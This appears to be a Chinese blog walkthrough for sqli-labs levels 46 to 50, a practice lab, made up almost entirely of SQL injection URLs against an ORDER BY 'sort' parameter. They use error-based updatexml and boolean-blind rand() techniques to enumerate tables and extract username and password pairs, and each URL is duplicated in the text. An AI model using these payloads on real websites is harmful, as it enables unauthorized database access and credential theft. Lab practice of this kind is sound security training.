sql-labs46-50通关攻略

第46关

一.查询数据库

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+

二.查表

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查user表里数据

http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+http://172.16.1.142/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select%20substring(group_concat(username,%27:%27,password),1,32)%20from%20users%20),0x7e),1)--+#substring

第47关

一.查询数据库

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

二.查表

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+

三.查列

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+

四.查询user表中数据

http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+http://172.16.1.142/Less-47/?sort=1%27%20and%20updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)--+

第48关

使用布尔盲注

一.查询数据库长度

http://127.0.0.1/Less-48/?sort=rand(length(database())=8)http://127.0.0.1/Less-48/?sort=rand(length(database())=8)

数据库长度为8

二.查询数据库命第一个字符

http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid(database(),1,1))=101)

ascii码 为101第一个字符为s

........接着往后查回查出数据库为'security'

三.查表格个数

http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)http://127.0.0.1/Less-48/?sort=rand((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=4)

说明数据库里有四个表格

四.第一个表格的名称的首字母

http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)http://127.0.0.1/Less-48/?sort=rand(ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101)

说明第一个表的字符为e

后面数据查询,同上

第49关

同48关

区别:字符型,需要用 ' 闭合

第50关

一.查询数据库

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,database(),0x7e),1)

二.查表

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)

三.查列

http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)http://172.16.1.142/Less-50/?sort=updatexml(1,concat(0x7e,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)

四.查询user表中数据

http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)http://127.0.0.1/Less-50/?sort=updatexml(1,concat(0x7e,(select%20concat(username,0x3a,password)from%20users%20limit%200,1),0x7e),1)

相关推荐
言之。7 分钟前
深入解析Django重定向机制
数据库·django·sqlite
时序数据说14 分钟前
国内开源时序数据库IoTDB介绍
大数据·数据库·物联网·开源·时序数据库·iotdb
Databend32 分钟前
CRC32 自包含退化现象分析
数据库
ITZHIHONH1 小时前
FastGPT源码解析 Agent知识库文本资料处理详解和代码分析
数据库·ai编程
小蒜学长3 小时前
基于Spring Boot的火灾报警系统的设计与实现(代码+数据库+LW)
java·数据库·spring boot·后端
福赖3 小时前
《MySQL基础——C 语言链接》
c语言·数据库·mysql
KIDAKN3 小时前
Redis 分布式锁
数据库·redis·分布式
程序新视界3 小时前
如何为MySQL中的JSON字段设置索引
数据库·mysql
Ultipa3 小时前
查询语言的进化:SQL之后,为什么是GQL?数据世界正在改变
数据库·sql·图数据库·gql